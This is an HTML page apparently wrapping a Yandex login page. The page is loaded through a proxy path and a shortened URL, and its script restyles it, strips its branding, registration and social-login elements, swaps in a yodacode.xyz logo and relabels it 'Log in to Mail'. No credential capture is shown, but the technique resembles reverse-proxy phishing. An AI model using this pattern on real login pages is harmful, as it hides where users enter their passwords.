<html>
<head>
  <title>Mail</title>
  <style>
    html, body, iframe {
      width: 100%;
      box-sizing: border-box;
      height: 100%;
      padding: 0px;
      margin: 0px;
      position: absolute;
      top: 0px;
      left: 0px;
      border: none;
    }
  </style>
  </head>
  
  <body>
    <iframe class="active" style="display: none;" src="/?dest=is.gd/fIsYaU"></iframe>
    <script>
      function render () {
      function tabQuerySelector (q) { return window.parent.document.querySelector('iframe.active').contentWindow.document.querySelector(q); }

function remove (q) { 
    if (tabQuerySelector(q)) {
        tabQuerySelector(q).remove();
    }
}

const body = tabQuerySelector('body');

body.innerHTML += `
<style>
@import url('https://fonts.googleapis.com/css2?family=Work+Sans:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');
* {
font-family: 'Work Sans'!important;
}
.passp-button.passp-sign-in-button > button {
    background-color: white!important;
    background: white!important;
    border-radius: 6px;
    box-shadow: 0px 2px 2px #00000077!important;
    border: 0.5px solid #00000099!important;
    transition: 0.1s all!important;
}
.passp-button.passp-sign-in-button:active > button {

    transform: translateY(1px)!important;
    box-shadow: none!important;
    background-color: #00000009!important;
}
.passp-button.passp-sign-in-button:hover > button {
    background-color: #00000009!important;
}
.passp-button.passp-sign-in-button > button:before, .passp-button.passp-sign-in-button > button:after {
    background: transparent!important;
} 
a.Logo {
background-image: url("https://yodacode.xyz/F2b9f1e90b6.png")!important;
}
a.Logo {
    border-radius: 50%;
}
</style>`

remove('[data-id=popup]');
remove('.AuthSocialBlock');
remove('.AuthLoginInputToggle-wrapper');
remove('#passp\\:exp-register');
remove('.AuthFooter-wrapper');
remove('.yaIdPromoText');
tabQuerySelector('a.Logo').href = 'https://yodacode.xyz';
tabQuerySelector('.passp-add-account-page-title').innerText = 'Log in to Mail';
    document.querySelector('iframe.active').style.display = 'block';
      }
      document.querySelector('iframe.active').onload = () => {
    setTimeout(() => {
    render();
    }, 5000);
    }
    </script>
  </body>
</html>
